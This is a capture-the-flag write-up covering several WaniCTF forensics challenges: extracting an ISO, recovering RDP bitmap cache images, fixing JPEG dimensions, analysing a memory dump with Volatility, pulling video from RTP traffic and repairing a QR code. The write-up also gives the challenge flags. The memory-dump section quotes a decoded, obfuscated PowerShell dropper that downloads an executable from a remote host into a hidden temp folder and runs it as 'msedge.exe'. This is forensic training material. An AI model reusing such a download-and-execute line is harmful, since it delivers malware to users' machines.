# WaniCTF
Solved by Raviel
All the challenges: https://drive.google.com/drive/folders/1n-0bDNWddJO4AJDAYqCwFduhcAZgcK61?usp=sharing
---
## Tiny_usb
### Beginner
The challenge gave us a iso file, just extract it and you will get a flag.
---
## Surveillance_of_sus
### Normal
The challenge gave us a bin file so I will strings it out first
I found out that its a RDP8Bmp so I will be using this **[tool](https://github.com/ANSSI-FR/bmc-tools)** to extract it https://github.com/ANSSI-FR/bmc-tools
and you will get the flag.
You can try to fix it by yourself or just guess the word and submit it.
---
## tiny_10px
### Normal
The challenge gave us a small picture
 **<--------------this is the image lol**
Based on the name of the challenge "Tiny_10px" and size, how can this tiny piece of image can be over 44kbs?
So its must be Height and Widgth Steganography and its a JPG
Do it by yourself by modifying the Hex bytes!
You may get this kind of result:
you can you editor or paint to get the flag, anyway here is the final flag
---
## mem_search
### Hard
The challenge gave us a DUMP file, so I will be using volatility to solve this, its also told us that the user found an unknown file so I will be checking the download folder first.
after checking the download I found there a suspicous file thats is "**read_this_as_admin.download**" so I dump it right away
The file connect the user to a website and download a file, so I will search for that file then read it again.
The file seem to be executing a powershell script after decode the string here the result:
```
$u='ht'+'tp://192.168.0.16:8282/B64_dec'+'ode_RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ==/chall_mem_s'+'.arch.e'+'.xe';$t='Wan'+'iT'+'.mkdir -force $env:TMP\\.$t;try{iwgr -OutFile $d\\msedg.exe;& $d\\msedg.exe;}catch{}
```
URL: **http://192.168.0.16:8282/B64_decode_RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ==/chall_mem_search.exe**
Assigns the directory $env:TMP\\WanIT
Its attempts to download the file **msedge.exe** from the URL into the directory and then executes it.
so we know the malware name, its **"msedge.exe"** so I need search then dump it out.
throw it in [TotalVirus](https://www.virustotal.com/gui/home/upload), here the result:
**Its reversing time!**
The first thing that catch my eye is the fake flag lol
FLAG{Hacked_yikes_spooky}
Anyway after analyze the whole malware its lead me to nothing so we need to take a step back to look for more clue then I notice something weird with the link
**`B64_decode_RkxBR3tEYXl1bV90aGlzX2lzX3NlY3JldF9maWxlfQ==`**
why does it has the part "B64_decode_...."
then I tried decode the latter part and got the Flag:
### **FLAG{Dayum_this_is_secret_file}**
---
## I_wanna_be_a_streamer
### Normal
The challenge gave us a pcap file
As you can see in the rex box, the user connect to a Camera using RTP protocol
after reading tons and tons of articles about RTP protocol
I finally found a way to solve this challenge
* First install this plugin for your wireshark
**------>https://github.com/volvet/h264extractor<------**
* open wireshark > Analyze > Decode as > add > RTP ( or RTP payload smth) > Edit > Preferences > Protocol > H.264 (type == 96) > Menu > Tools > Extract h264 stream from RTP
* ffmpeg -i file_extracted -c copy flag.mp4
---
## Codebreaker
### Beginner (I hate this chall)
the chall gave us a qrcode but got broken
Just like one of the challenge that I already done
------>https://hackmd.io/v3qpKEIWT1-aZbWrkaS2Ig (sr I wrote it in Vietnamese)
I reconstructed the Qrcode by replacing the 3 corner first
then I got the flag lmao, I got bad luck cause I have done a lots when I say a lots I really mean it, it cost me hours.
### FLAG{How_scan-dalous}
Okay Mikka thanks for the challs anyway whats a fun CTFs to play
Sign in with Wallet
Connect another wallet